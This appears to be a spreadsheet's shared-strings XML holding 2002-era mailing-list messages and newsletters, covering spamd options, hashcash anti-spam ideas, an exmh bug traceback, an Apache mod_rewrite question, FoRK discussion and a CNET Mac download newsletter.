 &gt; spamd --debug --daemonize --auto-whitelist --username=nobody --allowed-ips=1
 &gt; 92.168.1.1, 127.0.0.1"
 fwiw, I can't reproduce this with
   spamd --debug --auto-whitelist --allowed-ips="127.0.0.1"
   spamd --debug --auto-whitelist --allowed-ips="127.0.0.1, 192.168.1.1"
   spamd --debug --auto-whitelist --allowed-ips="192.168.1.1, 127.0.0.1"
 which I presume is what you meant (except for the missing args
 of course).  They all seem to work OK.
 --j.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</si>
  <si>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Fwd: [camram-spam] another framework hashcash related framework
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 Date: Sun, 11 Aug 2002 13:02:48 +0100
 To: usual@espace.net
 From: Fearghas McKay &lt;fearghas@mac.com&gt;
 Subject: Fwd: [camram-spam] another framework hashcash related framework
 Reply-To: "Usual People List" &lt;usual@espace.net&gt;
 Sender: &lt;usual@espace.net&gt;
 --- begin forwarded text
 Mailing-List: contact camram-spam-help@camram.org; run by ezmlm
 X-No-Archive: yes
 Reply-To: camram-spam@camram.org
 Delivered-To: mailing list camram-spam@camram.org
 Delivered-To: moderator for camram-spam@camram.org
 Date: Fri, 2 Aug 2002 00:42:53 +0100
 From: Adam Back &lt;adam@cypherspace.org&gt;
 To: CAMRAM &lt;camram-spam@camram.org&gt;
 Cc: Adam Back &lt;adam@cypherspace.org&gt;
 Subject: [camram-spam] another framework hashcash related framework
 There is a framework for using a hashcash like proof of work function
 as a way to frustrate junk mailers in this paper:
 "Curbing Junk E-Mail via Secure Classification"
 by E. Gabber, M. Jakobsson, Y. Matias, A. Mayer Bell
 in FC98.
 Online copy here:
 http://citeseer.nj.nec.com/27735.html
 (Look in the view or download section at the top right, it's
 availabile in at least .pdf and .ps formats).
 The framework they propose with proxies etc looks a lot like the
 current camram architecture, with a proof of work to get on a white
 list.  They use target revokable email addresses (basically identical
 to the LWPA concept) to implement the white list.
 The resulting framework is essentially identical to what I proposed in
 recent message with:
 Subject: target revokable email addresses, and postage-free tokens
 Their idea of including the postage free-token in the email address,
 mirrors what is done in LWPA and makes the system exhibit smoother
 migration for non-users.  eg. you can use varied sender addresses and
 it will still work, you can forward the email address to someone else
 and it will still work etc.
 They have some software architecture diagrams and suggestions for
 installing some of the proxies on a corporate gateway -- "gatekeeper"
 they call it.
 Adam
 ---------------------------------------------------------------------
 To unsubscribe, e-mail: camram-spam-unsubscribe@camram.org
 For additional commands, e-mail: camram-spam-help@camram.org
 --- end forwarded text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</si>
  <si>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--==_Exmh_-2079003886P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; Date:  Wed, 21 Aug 2002 10:40:39 -0500
 &gt;
 &gt; &gt; From:  Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;
 &gt; &gt; Date:  Wed, 21 Aug 2002 10:17:45 -0500
 &gt; &gt;
 &gt; &gt; &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; &gt; &gt; Date:  Wed, 21 Aug 2002 19:30:01 +0700
 &gt; &gt; &gt;
 &gt; &gt; &gt; Actually, you once could, now when I try this, entering a sequence name
 &gt; &gt; &gt; in the pick box, and a single message number, or a range N-N in the
 &gt; &gt; &gt; list of messages, and no pick attributes at all, I now get ...
 &gt; &gt; &gt; 
 &gt; &gt; &gt; syntax error in expression "int(1+1+(1 hit-1)*(3868-1-2)/(4878-1))"
 &gt; &gt; &gt;     while executing
 &gt; &gt; &gt; "expr int($minlineno+1+($msgid-$minmsgid)*($maxlineno-$minlineno-2)/($maxmsgid-$minmsgid))"
 &gt; &gt; &gt;     (procedure "Ftoc_FindMsg" line 46)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "Ftoc_FindMsg $msg"
 &gt; &gt; &gt;     (procedure "Ftoc_FindMsgs" line 5)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "Ftoc_FindMsgs $msgids"
 &gt; &gt; &gt;     (procedure "Ftoc_PickMsgs" line 5)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "Ftoc_PickMsgs $pick(ids) $pick(addtosel)"
 &gt; &gt; &gt;     (procedure "PickInner" line 13)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "PickInner {exec pick +inbox -list} {4852 -sequence mercury}"
 &gt; &gt; &gt;     ("uplevel" body line 1)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "uplevel #0 $cmd"
 &gt; &gt; &gt;     (procedure "busyCursorInner" line 8)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "busyCursorInner $cmd $widgets"
 &gt; &gt; &gt;     (procedure "busyCursorHack" line 32)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "busyCursorHack $args"
 &gt; &gt; &gt;     ("cursor" arm line 1)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "switch $busy(style) {
 &gt; &gt; &gt; 	icon		{busyIcon $args}
 &gt; &gt; &gt; 	cursorAll	{busyCursor $args}
 &gt; &gt; &gt; 	cursor		{busyCursorHack $args}
 &gt; &gt; &gt; 	default		{eval $args}
 &gt; &gt; &gt;     }"
 &gt; &gt; &gt;     (procedure "busy" line 3)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "busy PickInner $cmd $msgs"
 &gt; &gt; &gt;     (procedure "Pick_It" line 51)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "Pick_It"
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; ".pick.but.pick invoke"
 &gt; &gt; &gt;     ("uplevel" body line 1)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "uplevel #0 [list $w invoke]"
 &gt; &gt; &gt;     (procedure "tkButtonUp" line 7)
 &gt; &gt; &gt;     invoked from within
 &gt; &gt; &gt; "tkButtonUp .pick.but.pick
 &gt; &gt; &gt; "
 &gt; &gt; &gt;     (command bound to event)
 &gt; &gt; &gt; 
 &gt; &gt; &gt; It has been ages since I did this last though.   I tried adding a Subject
 &gt; &gt; &gt; to pick on (easy as I know what's in the message...) which made no difference.
 &gt; &gt; &gt; Looks as if something is now saying "1 hit" when before it didn't, or
 &gt; &gt; &gt; similar.
 &gt; 
 &gt; hmmm, that may or may not be my fault...I'll take a look at it.
 I can't reproduce this error.
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-2079003886P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9Y7fGK9b4h5R0IUIRAi69AJ97NVQMDxZgE1+ym7QMU7U0tnVvfACcCXpB
 o4QEnD6bGam5XzzQT+ZuzYY=
 =NtpE
 -----END PGP SIGNATURE-----
 --==_Exmh_-2079003886P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Eugen Leitl said:
 &gt; Spammers cannot be bothered to keep track if individual whitelists 
 &gt; associated with a given email address.
 But it's a good bet that jm /at/ jmason.org, or someone-else /at/
 jmason.org, is in jm /at/ jmason.org's whitelist.
 &gt; Of course you populate your whitelist with contents of your inbox minus 
 &gt; spam, and then add manually stuff from your addressbook.
 all I can read there is "manual"...
 --j.
 -- 
 'Justin Mason' =&gt; { url =&gt; 'http://jmason.org/', blog =&gt; 'http://taint.org/' }
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Webdev] mod_rewrite question
</t>
  </si>
  <si>
    <t xml:space="preserve"> I'm trying to wrap Zope up behind apache, so I can do VirtualHosts for
 Zope.
  I've a site on http://ip:8080/mysite.
  I want that to appear as http://mysite.com/ - so:
 &lt;VirtualHost 192.168.2.11&gt;
         ServerName mysite.com
         DocumentRoot /var/www/mysite
         RewriteEngine                   on
         RewriteRule     ^/(.*)    http://localhost:8080/mysite/$1 [P]
 &lt;/VirtualHost&gt;
  Now, what happens is that apache grabs http://localhost:8080/mysite/ and spits
 it out to the browser. Lovely. all works.
  Except for framed pages (like Zope's management interface). It ends up
 looking like:
     &lt;frameset rows="34, *"&gt;
     &lt;frame src="http://localhost:8080/reenactors/manage_top_frame"
 name="manage_top_frame"
    marginheight="0" scrolling="no"/&gt;
   &lt;frameset cols="175,*"&gt;
     &lt;frame src="http://localhost:8080/reenactors/manage_menu"
 name="manage_menu"
      marginwidth="2" marginheight="2" scrolling="auto"/&gt;
     &lt;frame src="http://localhost:8080/reenactors/manage_workspace"
 name="manage_main"
      marginwidth="2" marginheight="2" scrolling="auto"/&gt;
   &lt;/frameset&gt;
   &lt;/frameset&gt;
  and of course, that's not what my client should go to. Any ideas what I'm
 doing wrong ?
 Kate
 _______________________________________________
 Webdev mailing list
 Webdev@linux.ie
 http://www.linux.ie/mailman/listinfo/webdev
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: When a Crop Becomes King
</t>
  </si>
  <si>
    <t xml:space="preserve">On Friday, July 19, 2002, at 07:59 AM, Rodent of Unusual Size wrote:
 &gt; These days the
 &gt; nation's nearly 80 million-acre field of corn rolls across the
 &gt; countryside like a second great lawn, but this wholesome, all-American
 &gt; image obscures a decidedly more dubious reality.
 And if you mention any of the health problems too loudly, the kids with 
 glowing eyes take you away into the fields...
 http://www.angelfire.com/tn/cotcfanpage/
 ----
 Bill Humphries &lt;bill@whump.com&gt;
 http://www.whump.com/moreLikeThis/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; How were these msgs broken up into the 5 sets?  Set4 in particular is giving
 &gt; the other sets severe problems, and Set5 blows the f-n rate on everything
 &gt; it's predicting -- when the rates across runs within a training set vary by
 &gt; as much as a factor of 25, it suggests there was systematic bias in the way
 &gt; the sets were chosen.  For example, perhaps they were broken into sets by
 &gt; arrival time.  If that's what you did, you should go back and break them
 &gt; into sets randomly instead.  If you did partition them randomly, the wild
 &gt; variance across runs is mondo mysterious.
 They weren't partitioned in any particular scheme - I think I'll write a
 reshuffler and move them all around, just in case (fwiw, I'm using MH 
 style folders with numbered files - means you can just use MH tools to 
 manipulate the sets.)
 &gt; For whatever reason, there appear to be few of those in BruceG's spam
 &gt; collection.  I added code to strip uuencoded sections, and pump out uuencode
 &gt; summary tokens instead.  I'll check it in.  It didn't make a significant
 &gt; difference on my usual test run (a single spam in my Set4 is now judged as
 &gt; ham by the other 4 sets; nothing else changed).  It does shrink the database
 &gt; size here by a few percent.  Let us know whether it helps you!
 I'll give it a go.
 -- 
 Anthony Baxter     &lt;anthony@interlink.com.au&gt;   
 It's never too late to have a happy childhood.
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-695163552P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; Date:  Mon, 26 Aug 2002 14:00:18 +0700
 &gt;
 &gt;     Date:        Fri, 23 Aug 2002 10:58:20 -0500
 &gt;     From:        Chris Garrigues &lt;cwg-dated-1030550301.a24bc5@DeepEddy.Com&gt;
 &gt;     Message-ID:  &lt;1030118301.3993.TMDA@deepeddy.vircio.com&gt;
 &gt; 
 &gt;   | Interesting...I don't think this was my bug.
 &gt;   | It appears that Msg_Change was asked to change to message "-".
 &gt; 
 &gt; Something like that is quite possible, but perviously typing nonsense
 &gt; in didn't cause tracebacks, and now it does, and the traceback came
 &gt; from the sequence code...
 &gt; 
 &gt; Perviously this would have just caused red messages in the status
 &gt; line complaining about my lousy typing.   That's probably what it
 &gt; should keep on doing (the "red" part isn't important obviously..)
 Tell me what keystroke made it happen so I can reproduce it and I'll see what 
 I can do about it (or if I can't, I'll hand it off to Brent).
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-695163552P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ajrsK9b4h5R0IUIRAmd+AJ9WU9Wzf7ey0YYYTpYGcyJfpZuUFwCfX4CN
 KE8fxn3ZKKmtJCWgS2fXK/w=
 =enN3
 -----END PGP SIGNATURE-----
 --==_Exmh_-695163552P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --------------090600030109070305070809
 Content-Type: text/plain; charset=ISO-8859-1; format=flowed
 Content-Transfer-Encoding: 7bit
 Owen Byrne wrote:
 &gt; R. A. Hettinga wrote:
 &gt;
 &gt;&gt; -----BEGIN PGP SIGNED MESSAGE-----
 &gt;&gt; Hash: SHA1
 &gt;&gt;
 &gt;&gt; At 10:32 AM -0400 on 9/21/02, Gary Lawrence Murphy wrote:
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;  
 &gt;&gt;
 &gt;&gt;&gt; Cool --- I wasn't aware that the US had lifted it's population out
 &gt;&gt;&gt; of poverty! When did this happen? I wonder where the media gets the
 &gt;&gt;&gt; idea that the wealth gap is widening and deepening...
 &gt;&gt;&gt;   
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; All the world loves a smartass...
 &gt;&gt;
 &gt;&gt; :-).
 &gt;&gt;
 &gt;&gt; Seriously. Look at he life expectancy and human carrying capacity of
 &gt;&gt; this continent before the Europeans got here. Look at it now. Even
 &gt;&gt; for descendants of the original inhabitants. Even for the descendents
 &gt;&gt; of slaves, who were brought here by force.
 &gt;&gt;
 &gt;&gt; More stuff, cheaper. That's progress.
 &gt;&gt;
 &gt;&gt; Poverty, of course, is not relative. It's absolute. Disparity in
 &gt;&gt; wealth has nothing to do with it.
 &gt;&gt;
 &gt;&gt; It's like saying that groups have rights, when, in truth, only
 &gt;&gt; individuals do. Like group rights, "disparity" in wealth is
 &gt;&gt; statistical sophistry.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; Besides, even if you can't help the distribution, industrial wealth
 &gt;&gt; is almost always transitory, and so is relative poverty, even when
 &gt;&gt; there are no confiscatory death-taxes. The 20th anniversary Forbes
 &gt;&gt; 400 just came out, and only a few tens of people are still there
 &gt;&gt; since 1982, a time which had significantly higher marginal taxes on
 &gt;&gt; wealth, income, and inheritance than we do now. More to the point,
 &gt;&gt; they're nowhere near the top.
 &gt;&gt;  
 &gt;&gt;
 Lovely quote from the Forbes 400 list:
 "and not a single Astor, Vanderbilt or Morgan rates a mention on the 
 current Forbes Four Hundred. "
 But you have to studiously ignore the 4 Rockefellers, 3 Gettys, 3 
 Hearsts,  Fords, Kelloggs, Wrigleys,
 and so on.
 There are more self-made people on the list than I previously alluded to 
 - I made a mistake. Most
 of them seem to have Ivy League educations, or are Ivy League dropouts, 
 suggesting to me that they weren't
 exactly poor to start with. Some of them have lovely self-made stories 
 like:
 #347, Johnston, Summerfield K Jr
 track this personTrack This Person 
 &lt;http://www.forbes.com/peopletracker/add_person.jhtml?successURL=%2Fpeopletracker%2Fprotected%2Frich_tracker.jhtml&amp;errorURL=%2Fpeopletracker%2Ferror.jhtml&amp;personId=221899&gt;
  | See all Bacon Makers 
 &lt;http://www.forbes.com/lists/results.jhtml?passListId=54&amp;passYear=2002&amp;passListType=Person&amp;resultsStart=1&amp;resultsHowMany=25&amp;resultsSortProperties=%2Bnumberfield1%2C%2Bstringfield1&amp;resultsSortCategoryName=rank&amp;searchParameter1=10Str%7C%7CPatCS%7C%7CBacon+Makers&amp;category1=Magazine+Section&amp;category2=category&amp;searchParameter2=unset&gt; 
 70 , self made
 *Source: Food 
 &lt;http://www.forbes.com/lists/results.jhtml?passListId=54&amp;passYear=2002&amp;passListType=Person&amp;resultsStart=1&amp;resultsHowMany=25&amp;resultsSortProperties=%2Bnumberfield1%2C%2Bstringfield1&amp;resultsSortCategoryName=rank&amp;searchParameter1=5Str%7C%7CPatCS%7C%7CFood&amp;category1=Industry&gt;, 
 Coca-Cola* (quote 
 &lt;http://www.forbes.com/finance/mktguideapps/compinfo/CompanyTearsheet.jhtml?tkr=CCE&gt;, 
 executives 
 &lt;http://www.forbes.com/peopletracker/results.jhtml?startRow=0&amp;name=&amp;ticker=CCE&gt;, 
 news &lt;http://markets2.forbes.com/rpt/Company_News.asp?Symbol=CCE&gt;)
 Net Worth: *$680 mil* returnee
 Hometown: Chattanooga , TN
 *Marital Status:* married , 5 children
 Grandfather James and partner landed first Coca-Cola bottling franchise 
 in 1899. Company passed down 3 generations to Summerfield 1950s. Became 
 largest independent Coke bottler. Merged with Coca-Cola Enterprises 1991.
 &lt;javascript:openMap('pol');&gt; &lt;javascript:openMap('dist');&gt;
 (...by a compensation committee)
 Owen
 --------------090600030109070305070809--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Think before you leap, man flies powered parachute into
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-2,8418808,1717/
 Date: 2002-10-01T04:30:17+01:00
 (The Cincinnati Enquirer)
</t>
  </si>
  <si>
    <t xml:space="preserve">CNET | DOWNLOAD DISPATCH(Mac Edition)
 July 16, 2002
 Vol. 7, No. 28
 A Screen Dream
 Good Mac screensavers are hard to come by. And screensavers are
 important: not only do they preserve your screen quality, but
 they can also turn your monitor into a conversation piece.
 Marine Aquarium, our Pick of the Week, will turn your desktop
 into a virtual tropical fish aquarium that will make your Mac
 turn some heads. No need to feed:
 http://clickthru.online.com/Click?q=c2-oXxLQUEkRh6pmyFgVnxXFZcIuInR 
 Also this week, we've got QuickTime 6, the media player's long-
 awaited first foray into MPEG-4 technology; Cartoon Editor, a
 graphic editor that will help you make QuickTime cartoons;
 MoonDock, so you can keep track of moon phases on your desktop;
 WebDesign, a full-featured HTML editor with lots of extras; and
 Sigma Chess Lite, so you can challenge your mind and develop
 your skills at the ancient game of chess.
 Enjoy!
 Jason Parker
 Assistant Editor, CNET Download.com
 --
 (Unsubscribe instructions are at the bottom of this
 newsletter.)
 &lt;---------------Advertisement---------------&gt;
 Gateway High Performance Desktops - starting at $699!
 High Performance, the 500 Series goes beyond the basics and
 features some of the latest technology.  With new sleek
 platinum cases, systems include Intel(R) Pentium(R) 4
 processors, USB 2.0 support, Mid-Tower chassis, Broadband
 Ready and Microsoft(R) Windows(R)XP.  Click here for details!
 http://clickthru.online.com/Click?q=d7-wk3ZQLWkDhLMkvyRmBekeVktk2eR 
 &lt;-------------------------------------------&gt;
 IN THIS ISSUE:
 1. This Week's Top 10 Downloads
 2. Pick of the Week: Marine Aquarium
 3. The Week in Wares:
               - Multimedia and design: QuickTime, Cartoon Editor
               - Home and education: MoonDock
               - Development tools: WebDesign
               - Games: Sigma Chess Lite
 4. Updates &amp; Drivers
 5. The Week in Reviews: A TiVo-like toy for the Mac?
 6. Overheard on Download.com
 7. Download.com Outage Notice
 P.S. Got a suggestion for CNET Download.com? Send it to:
 suggestions@download.com
 _____________________________________________________________
 1. This Week's Top 10 Downloads
    1. LimeWire 2.4.4                         6,190 downloads
    2. LimeWire (OS X) 2.4.4                  4,561 downloads
    3. MacSatellite  1.6.1                    4,313 downloads
    4. Hotline Connect Client 1.8.5           3,656 downloads
    5. RealPlayer 8.0                         2,939 downloads
    6. Deck 3.5                               2,908 downloads
    7. Fetch 4.0.1                            2,333 downloads
    8. Internet Explorer 5.1.4                2,229 downloads
    9. Marine Aquarium 0.99.0                 1,837 downloads
   10. Internet Explorer (OS X) 5.2.1         1,820 downloads
 For more details on Download.com's most popular files, click
 here: http://clickthru.online.com/Click?q=ec-MHyXQVy2Fg64heA1kOqFb2GVaGyR 
 ______________________________________________________________
 2. Pick of the Week
    MARINE AQUARIUM
    Version: 0.99.0
    File size: 3MB
    License: Free to try; $12.95 to buy
    Minimum Requirements: Mac OS X
    As the name suggests, this program puts an incredibly
    realistic aquarium of saltwater fish on your screen. You can
    select from a variety of highly textured fish to swim across
    your desktop, and you can control variables such as lighting
    and the number of fish. There is even a starfish that you can
    track over time to watch how it adapts to its environment.
    http://clickthru.online.com/Click?q=01-9oXDI2jHs5fAjPfvurMPGPxZ6RlR 
    Want to review Marine Aquarium? Submit your opinion here:
    http://clickthru.online.com/Click?q=17-agitI5XroKlI4b9Iz4s1RhjGRseR 
    Find all of our Picks here:
    http://clickthru.online.com/Click?q=2c-DatOIc0DRUD42bbc-r7MBvWpjuyR 
 ______________________________________________________________
 3. The Week in Wares
    IN MULTIMEDIA AND DESIGN:
    QUICKTIME
    Version 6.0
    File size: 402K
    License: Free
    Minimum requirements: Mac OS 8.6/9.x or Mac OS X
    The latest version of Apple's premiere media application
    supports the increasingly popular MPEG-4 codec for high-
    quality, highly compressed video, as well as modern formats
    such as AAC (Advanced Audio Codec) and JPEG 2000. It also
    provides skip protection, an enhanced user interface with a
    more intuitive and useful Favorites menu, new developer APIs,
    and other useful features such as support for Flash 5 files.
    http://clickthru.online.com/Click?q=41-qqJ1IEKIeDjNLmwU5CfCkxHB0FFR 
    Want to review QuickTime? Submit your opinion here:
    http://clickthru.online.com/Click?q=56-NwKYInnsvJh4BuHrctPQDwwaMC9R 
    CARTOON EDITOR
    Version: 1.2.1
    File size: 2.38MB
    License: Free
    Minimum requirements: Mac OS X
    Cartoon Editor won't turn you into a gifted cartoonist
    overnight. But what this graphic editor will do is make quick
    work of creating short QuickTime movies and animated GIFs--
    and for OS X freeware, it doesn't get much better than that.
    Cartoon Editor lets you draw or import JPEGs and GIFs, which
    you can then manipulate with a set of tools that lets you
    group, scale, duplicate, ghost, and all sorts of other useful
    cartoony things. The program's Java2D foundation allows for
    some surprisingly powerful features, like gradients,
    antialiasing, splining, and transparencies.
    http://clickthru.online.com/Click?q=6b-8g5ZIHEcOAstO5H80ywQ-4d0P6cR 
    Want to review Cartoon Editor? Submit your opinion here:
    http://clickthru.online.com/Click?q=80-KTKvQQ0KYe11T0DoaDkjVsTLZ8iR 
    Find all of the latest multimedia and design software here:
    http://clickthru.online.com/Click?q=95-XdwrQvdJfe0atPOr1yZeU_u_KnPR 
    IN HOME AND EDUCATION:
    MOONDOCK
    Version: 1.2.2
    File size: 1.95MB
    License: Free
    Minimum Requirements: Mac OS X
    Get in touch with the natural rhythms of our solar system
    with MoonDock, a simple piece of software that tracks the
    phases of the moon for you and displays lovely images of our
    planet's companion satellite on your desktop. The images are
    high-quality color photos that change over time in accordance
    with the date. MoonDock includes both astronomical and survey
    data, meaning that you can calculate the appropriate moon
    phase for a particular date and identify topographical
    features on the moon using a built-in catalog of those that
    have been surveyed by astronomers and astronauts. This update
    incorporates improved help features and a few bug fixes.
    http://clickthru.online.com/Click?q=aa-gBteQXUr_tMV_meWLXZBXqONOVnR 
    Want to review MoonDock? Submit your opinion here:
    http://clickthru.online.com/Click?q=bf-JtRfQ8Zrg9xPaKu5w8PF_jEuwteR 
    Find all of the latest home and education software here:
    http://clickthru.online.com/Click?q=d4-E0SqQ0ExoPq8KVw_4Mc3148lk6yR 
    IN DEVELOPMENT TOOLS:
    WEBDESIGN
    Version: 1.6
    File size: 1.5MB
    License: Free to try; $28.95 to buy
    Minimum Requirements: Mac OS 9.x through Mac OS X 10.1.5
    Web designers have an array of software choices, from writing
    straight code in something like SimpleText to automating
    everything via drag-and-drop programs that keep HTML at arm's
    length. WebDesign offers a happy medium, with a significant
    number of nice extras. You can drag-and-drop from menus or
    edit your syntax line by line; build image maps and forms
    with relative ease; and work with a full selection of tools
    for site-wide color scheme changes, text manipulation, and
    localization. WebDesign supports both HTML and XHTML, along
    with JavaScript, tabs, and Cascading Style Sheets. This new
    version lets you view your designs as they will be seen with
    various browsers, and has more stable editing and FTP tools.
    http://clickthru.online.com/Click?q=ea-fjLyQhV4XV54QHSAwQ4lAUw-5WnR 
    Want to review WebDesign? Submit your opinion here:
    http://clickthru.online.com/Click?q=ff-sVoVQms4mycg6wFZxrhBm0WHtheR 
    Find all of the latest development tools here:
    http://clickthru.online.com/Click?q=14-5MRAIF-zGNg8yFP8ZvQIzTKtR1yR 
    IN GAMES:
    SIGMA CHESS LITE
    Version: 6.01
    File size: 2.94MB
    License: Free
    Minimum Requirements: System 7.x
    Put your mind to the test with this customizable chess game.
    Sigma is OS X-native and lets you develop your skills through
    levels with adjustable difficulty and customizable pieces and
    boards. What's more, Sigma offers advanced features such as
    printing functions, player rankings, and the ability to
    record and collect your matches.
    http://clickthru.online.com/Click?q=29-Sg_rIjMAh2p0eOyNyGEI9rCM8vlR 
    Want to review Sigma Chess Lite? Submit your opinion here:
    http://clickthru.online.com/Click?q=3e-F51nIizXmE6GxOG_7DQESNPe-i4R 
    Find all of the latest games here:
    http://clickthru.online.com/Click?q=53-n86dINn6Z4onc-PjHpx8lOheMncR 
 ______________________________________________________________
 4. Updates &amp; Drivers: Stay on Top of Bug Fixes and New Features
    IN INTERNET:
    - Internet Explorer (OS X) 5.2.1
      http://clickthru.online.com/Click?q=68-iM8qIsPPH1noIAYywvjsK-FdLPRR 
    - mDialog 1.5
      http://clickthru.online.com/Click?q=7d-FFEqIDLPzooVNqPUywq2NRJSBTZR 
    - Email Magician 1.9
      http://clickthru.online.com/Click?q=92-ubRVQTzT5OEFHMGzeFOPq1FsnynR 
    IN MULTIMEDIA &amp; DESIGN:
    - Audacity 1.0
      http://clickthru.online.com/Click?q=a7-fR_2Q8BwVK0bvAKLF5vLk7KCgFeR 
    - Audion 3.0
      http://clickthru.online.com/Click?q=bd-c0nUQ7py5LqbJMqpAEVgnfqGsJPR 
    - Audion (OS X) 3.0
      http://clickthru.online.com/Click?q=d2-THo_QULw1K18AlW3Gl22vbAOyenR 
    IN UTILITIES:
    - MacAnalysis 2.2.1
      http://clickthru.online.com/Click?q=e7-2y-GQmVXoNS0Rb0VqS8CMB0qvseR 
    - SpeedRun 1.1
      http://clickthru.online.com/Click?q=fc-WpHmQVwFSZlZa-Pa9-0t3VVat9yR 
    - DockFun! 3 preview 1
      http://clickthru.online.com/Click?q=11-l8riI2-4EmyuB-jX3VynhNBuCqlR 
    IN BUSINESS AND FINANCE:
    - OmniGraffle (OS X) 2.0.5
      http://clickthru.online.com/Click?q=26-KqPVIiMHorsZwJdBBBkqU8niQ74R 
    - Sambucus 2.0.1
      http://clickthru.online.com/Click?q=3b-XhxVINdHn73JEjnFPcZsjpRp-LrR 
    IN HOME AND EDUCATION:
    - Blues Music 1.0
      http://clickthru.online.com/Click?q=50-M_CBIR0XguMCAewASOnO8CtmMgRR 
    - Dramatica Pro 4.0
      http://clickthru.online.com/Click?q=65-K82zIDPtIzc8RGwD70VOf0m8P9ZR 
    - iNotePad 1.6.1
      http://clickthru.online.com/Click?q=7a-EE_AIPBjUlSulSvhU6coezkBZXdR 
 _______________________________________________________________
 5. The Week in Reviews:
    A TiVo-like toy for the Mac?
    A Macintosh software company plans to launch Monday the first
    consumer personal video recorder for Mac aficionados.
    http://clickthru.online.com/Click?q=8f-OOYvQ8KKwfwRqEUXvsg9tyQFWveR 
 _______________________________________________________________
 6. Overheard on Download.com
    Here are some user comments about a Mac game that takes you
    back to the days of hanging out at the arcade:
    "Cool!"
    "An arcade classic!!!"
    "Great fun without violence!"
    "Addicting!!!!"
    "Excelente"
    So what's the name of this mystery download? Click here to
    find out:
    http://clickthru.online.com/Click?q=a5-DyaHQ7ZTaQfujbpsIC1b2OB8OEPR 
 _______________________________________________________________
 The e-mail address for your subscription is qqqqqqqqqq-zdnet@spamassassin.taint.org
 To sign up for more CNET newsletters, click here:
 http://nl.com.com/servlet/url_login?email=&amp;brand=cnet
 To unsubscribe, click here:
 http://clickthru.online.com/Click?q=ba-m-e5rUpfTfmrcJ0ghqSMlcoEWYe2yRRR
 To receive your newsletter in HTML format, click here:
 http://nl.com.com/servlet/url_login?email=&amp;brand=cnet
 For the CNET Newsletters FAQ, click here:
 http://clickthru.online.com/Click?q=cf-ebM-QLw2HM7JIXMJaylIO7r3fxeR 
 To learn about advertising opportunities in CNET Newsletters, click here:
 http://clickthru.online.com/Click?q=e4-ABYFQVkWG2Bq9mbI81u0PT_Qv1yR 
 Copyright 2002 CNET Networks, Inc. All rights reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Are you being Freeserved?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8381146,215/
 Date: 2002-09-30T03:04:57+01:00
 *Internet news:* Can Freeserve hold on to its position as the ISP that most 
 Britons dial up to, asks Kate Bulkley.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Meet Carol Ann Duffy
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8699227,215/
 Date: 2002-10-09T12:01:59+01:00
 *Live online:* One of Britain's leading poets will be here tomorrow at 2.15pm 
 to celebrate National Poetry day. Post your questions now.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Marriage makes both sexes happy
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8483157,1440/
 Date: Not supplied
 Contrary to popular belief, a new study shows women receive the same mental 
 health boost from marriage as men
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, 3 Sep 2002, Russell Turpin wrote:
 &gt; For the most part, these were angry, middle-aged men. A column in this
 &gt; table shows their age at the time:
